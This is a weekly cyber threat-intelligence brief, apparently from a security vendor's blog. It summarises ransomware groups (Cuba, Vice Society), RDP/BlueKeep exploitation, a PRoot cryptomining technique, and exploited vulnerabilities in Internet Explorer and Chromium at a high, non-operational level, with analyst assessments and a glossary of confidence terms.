Cyber Intel Brief: Dec 1 – 7, 2022


CISA Publishes Advisory for Cuba Ransomware Affiliates

Impacted Industries: Financial and Insurance, Public Administration, Healthcare and Social Assistance, Manufacturing, and Information

What You Need To Know:

The FBI and CISA released a joint Cybersecurity Advisory (CSA) to disseminate known Cuba ransomware TTPs and observables identified through FBI investigations, third-party reporting, and open-source reporting. The advisory updates the FBI’s December 2021 Flash: Indicators of Compromise Associated with Cuba Ransomware.

Analyst Note: Since the December 2021 FBI Flash release, the number of U.S. entities compromised by Cuba ransomware, with ransoms demanded and paid, has doubled. As of August 2022, the FBI has identified that Cuba ransomware actors have compromised over 100 entities worldwide. FBI has observed Cuba ransomware actors continuing to target U.S. entities in the following five sectors: financial and insurance, public administration, healthcare and social services, manufacturing, and information. The threat actors will likely continue to exploit known vulnerabilities, send phishing emails that drop RomCom malware, using compromised credentials and RDP tools to gain initial access.


Profile of Vice Society Ransomware Threat Actor

Impacted Industries: All; Primarily has focused on Educational Services

What You Need To Know:

Palo Alto’s Unit 42 published a profile of the Vice Society ransomware group, active since 2021, and has targeted victims in various industries, particularly education, healthcare, and public administration. The group uses a variety of ransomware strains and has been known to exploit vulnerabilities such as PrintNightmare to escalate privileges and spread laterally across targeted networks. They have also been observed timing their attacks to coincide with the beginning and end of the school year in the U.S. Victims are typically small- to medium-sized businesses with no clear geographical focus. Protecting against Vice Society requires a robust behavioral monitoring platform and adequately trained staff to handle ongoing ransomware threats.

Analyst Note: According to their leak site, Vice Society has compromised 91 organizations, with 33 victims in the educational services sector. Most of their victims are in the United States, operating in educational services, healthcare and social assistance, state and local government, and manufacturing. They recently added a blog to their leak site where they refute claims that they sometimes avoid using ransomware and instead focus on simple extortion. They also stated they had been working for too long. Their statement suggests that they are taking a break from targeting the US educational sector and will resume or that they have stopped targeting the US educational sector and will focus on other industries and countries.

Threat Landscape

Rise in Exploitation Attempts Against RDP

Impacted Industries: All; Cyble observed threat actors selling RDP access for public administration, finance and insurance, manufacturing, and information sectors

What You Need To Know:

Cyble’s global sensor network data identified almost 5 million RDP exploitation attempts between September and November, primarily targeting the United States and Russia. The most prevalent vulnerability threat actors attempted to exploit was the BlueKeep vulnerability (CVE-2019-0708). Cyble hypothesizes that most exposed RDP ports over the internet still contain the BlueKeep vulnerability, identifying over 50,000 internet-exposed instances still affected by the BlueKeep vulnerability.

Analyst Note: Internet-exposed RDP has played critical roles in previous cyber incidents, as seen in the last two Cyber Intel Briefs. Cyble’s dark web data has captured 154 forum posts by various threat actors, selling access to over 10,000 RDPs for multiple sectors like public administration, finance and insurance, manufacturing, information, etc. The Adversary Tactics and Intelligence (ATI) team assesses that threat actors’ use of RDP access will increase in the next two weeks to gain initial access or move laterally in the targeted environment.


Threat Actors Use Open-source Tool to “Bring Their Own Filesystem” to Deploy Cryptominers

Impacted Industries: Educational Services

What You Need To Know:

Sysdig, a cloud security company, recently discovered a threat actor (TA) leveraging an open-source tool called PRoot to “bring-their-own-filesystem,” allowing the TA to execute the tools and malware from this filesystem. During the attacks, the TA downloaded masscan, Nmap, and XMRig cryptominer in a gzip compressed tar file and hosted the archive on a popular storage platform. Once the TA gained access to the target system, they downloaded the filesystem and PRoot, saving them to the tmp/Proot folder, unpacking the filesystem, and running the PRoot executable. The threat actors then executed a bash shell from this new file system, which is now running from the TAs filesystem instead of the original host filesystem.

Analyst Note: PRoot allows an adversary to run the tools and malware across different Linux distributions and allows threat actors to run malware built on other architectures, such as ARM. Creating the filesystem outside the targeted network allows the threat actor to download and configure all tools and malware, avoiding detection and security solutions deployed in the targeted environment. We expect threat actors to employ this technique in cryptomining attacks for the foreseeable future. However, as the method becomes more widely known by threat actors, threat actors could use it to infect systems with ransomware and download other malware post-exploitation.

Exploited Vulnerabilities

APT 37 Uses Office Docs to Exploit CVE-2022-41128

Impacted Industries: All; APT 37 primarily targets public & private organizations in support of DPRK’s strategic military, political, and economic interests

What You Need To Know:

A threat actor attributed by Google to APT 37, a North Korean state-backed threat group, exploited CVE-2022-41128, an Internet Explorer (IE) vulnerability, via a malicious Microsoft Office document. Google discovered the document when several South Korean-based VirusTotal users uploaded the document. The document downloads a rich text file (RTF) remote template that fetches remote HTML content using IE that doesn’t require the user to use or have the browser as their default browser. However, Google could not recover the final payload for this campaign. They’ve previously observed APT 37 deliver a variety of implants like ROKRAT, BLUELIGHT, and DOLPHIN.

Analyst Note: Threat actors can exploit this vulnerability through malicious documents (the technique used in this incident) or by luring them to visit a malicious website. Threat actors that use the phishing technique to exploit the vulnerability would require the user to disable the protected view, initiating the infection. Google’s report shows that “Mark-of-the-Web” is not foolproof and poses a significant risk to organizations. We assess that other North Korean threat groups will likely adopt this technique in their campaigns for financial and intelligence collection and that non-North Korean-sponsored threat actors will incorporate this vulnerability exploitation in their campaigns.

Exploited Vulnerabilities

CISA Adds CVE-2022-4262 to its Known Exploited Vulnerabilities Catalog

Impacted Industries: All

What You Need To Know:

Based on the evidence of active exploitation, CISA has added CVE-2022-4262 to its Known Exploited Vulnerabilities Catalog. This vulnerability affects Google’s Chromium V8 engine that could allow a threat actor to potentially exploit heap corruption via a crafted HTML page. CISA does not have additional data on impact.

Analyst Note: Threat actors will likely ramp up exploitation efforts of the newly listed vulnerability within the next two weeks. However, we can not rule the possibility that threat actors could switch to other tactics & techniques to gain initial access. We base this assessment on CISA documenting the vulnerabilities in their Exploited Vulnerabilities Catalog and the likelihood that organizations will prioritize remediation of these vulnerabilities

What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like “might” reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.


LinkedIn Twitter YouTube

Subscribe to the Deepwatch Insights Blog